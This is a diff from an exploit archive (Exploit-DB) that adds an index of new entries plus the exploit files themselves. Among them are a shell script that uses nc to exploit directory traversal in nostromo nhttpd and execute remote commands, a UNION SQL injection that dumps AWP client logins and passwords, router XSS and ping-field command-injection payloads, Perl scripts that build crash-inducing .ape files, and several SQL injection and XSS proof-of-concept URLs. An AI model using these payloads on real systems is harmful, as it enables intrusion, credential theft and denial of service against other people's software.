Updated 12_06_2014

files.csv

@@ -31937,3 +31937,12 @@ id,file,description,date,author,platform,type,port
 35456,platforms/php/webapps/35456.txt,"BoutikOne rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35457,platforms/php/webapps/35457.txt,"BoutikOne rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80
+35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 V2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80
+35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80
+35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0
+35465,platforms/multiple/remote/35465.pl,"VLC Media Player 1.0.5 '.ape' File Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,remote,0
+35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 Directory Traversal Remote Command Execution Vulnerability",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0
+35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure Vulnerability",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0
+35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0
+35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0
+35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0

platforms/cgi/webapps/35463.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability
+# Date: 12/02/2014
+# Author: Robert Cooper (robertc[at]areyousecure.net)
+# Software Link: http://www.guruperl.net/products/awppro/
+# Tested on: [Linux/Windows 7]
+# Vulnerable Parameter: group_id=
+ 
+##############################################################
+
+PoC:
+
+http://server/cgi/client.cgi?act=list_zone&group_id=1'
+
+http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--
+ 
+(Passwords are stored in plaintext) 
+
+##############################################################
+
+http://www.areyousecure.net

platforms/hardware/webapps/35462.txt

@@ -0,0 +1,24 @@
+Product: Wireless N ADSL 2/2+ Modem Router
+Firmware Version : V2.05.C29GV
+Modem Type : ADSL2+ Router
+Modem Vendor : Technicolor
+Model: DT5130
+
+Bugs:
+1- Unauth Xss - CVE-2014-9142
+user=teste&password=teste&
+userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login
+
+2- Arbitrari URL redirect - CVE-2014-9143
+failrefer=http://blog.dclabs.com.br&login=Login&password=
+pass&refer=/index.html&user=1&userlevel=15
+
+3- Command Injection in ping field - CVE-2014-9144
+setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE
+
+
+-- 
+Ewerson Guimaraes (Crash)
+Pentester/Researcher
+DcLabs / Ibliss  Security Team
+www.dclabs.com.br / www.ibliss.com.br

platforms/linux/remote/35466.sh

@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/46880/info
+
+nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.
+
+An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.
+
+nostromo versions prior to 1.9.4 are affected.
+
+#!/bin/sh
+######################################
+#                                    #
+#  RedTeam Pentesting GmbH           #
+#  kontakt@redteam-pentesting.de     #
+#  http://www.redteam-pentesting.de  #
+#                                    #
+######################################
+
+if [ $# -lt 3 ]; then
+    echo "Usage: $(basename $0) HOST PORT COMMAND..."
+    exit 2
+fi
+
+
+HOST="$1"
+PORT="$2"
+shift 2
+
+( \
+    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
+    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
+    echo "$@ 2>&1" \
+) | nc "$HOST" "$PORT" \
+  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

platforms/multiple/remote/35464.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46864/info
+
+Trend Micro WebReputation API is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass the filter included in the download mechanism. Successful exploits may cause victims to download malicious files onto affected computers.
+
+This issue affects WebReputation API 10.5; other versions may also be vulnerable. 
+
+ http://www.example.com/dist/nmap-5.51-setup.exe? 

platforms/multiple/remote/35465.pl

@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/46868/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+
+###
+# Title : VLC media player v1.0.5 (.ape) Local Crash PoC
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : VLC media player Just Crashed
+# Tested on : Windows XP SP3 Fran?ais 
+# Target : VLC media player v1.0.5
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : 1 - Creat APE file ( Monkey's Audio Format )
+#      =>    2 - Open APE file With VLC 1.0.5
+#      =>    3 -  Crashed !!!
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |===========================================================|\n";
+print "    |= [!] Name : VLC media player v1.0.5 (Monkey's File)      =|\n";
+print "    |= [!] Exploit : Local Crash PoC                           =|\n";
+print "    |= [!] Author : KedAns-Dz                                  =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
+print "    |===========================================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
+open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
+print file $PoC;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);  
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX 
+# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah 
+# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
+# Greets All My Friends (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
+# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
+# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
+#===============================================================================

platforms/php/webapps/35467.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46885/info
+
+SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data.
+
+Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
+
+
+http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates
+
+http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates 

platforms/php/webapps/35469.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46888/info
+
+Wikiwig is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Wikiwig 5.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E 

platforms/php/webapps/35470.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46896/info
+
+AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/page_info.php?id_brt=[Sql_injection] 

platforms/windows/remote/35468.pl

@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/46887/info
+
+Monkeyâ??s Audio is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
+
+#!/usr/bin/perl
+
+###
+# Title : Monkey's File Audio (All MPlayers) Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Overflow & Crash's
+# Tested on : Windows XP SP3 Fran?ais 
+# Target : All Media Players
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# File Home : (http://www.monkeysaudio.com)
+# Error's Detected : 
+# Media Player Classic v6.4.9.1 [MonkeySource.ax !0x020451a6()!] >> http://1337day.com/exploits/15581  || By KedAns-Dz
+# JetAudio v5.1.5.2 [JFACMDec.dll !0x02FA1BBD()!] >> http://packetstormsecurity.org/files/view/99200/jetaudio5152ape-overflow.txt  || By KedAns-Dz
+# KMPlayer 2.9.3 [MACDec.dll !0x??????()!] >> http://packetstormsecurity.org/files/view/99190/kmplayerape-overflow.txt  || By KedAns-Dz 
+# VLC media player v1.0.5 [axvlc.dll !0x??????()!] >> http://1337day.com/exploits/15595  || By KedAns-Dz
+# QuickTime Player [Not Detected !!] ' Because Can not Read (APE) Files Format
+# RealPlayer [Not Detected !!] ' Because Can not Read (APE) Files Format
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |======================================================|\n";
+print "    |= [!] Name : Monkey's File Audio (.ape) All Players  =|\n";
+print "    |= [!] Exploit : Stack Buffer Overflow                =|\n";
+print "    |= [!] Author : KedAns-Dz                             =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                 =|\n";
+print "    |======================================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header (16 bytes)
+open(file , ">", "Kedans.ape"); # Evil File APE (4.0 KB)
+print file $PoC;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);  
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX 
+# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah 
+# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
+# Greets All Bad Boys (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
+# hotturks.org : TeX * KadaVra ... all Others
+# Kelvin.Xgr ( kelvinx.net)
+#===========================================================================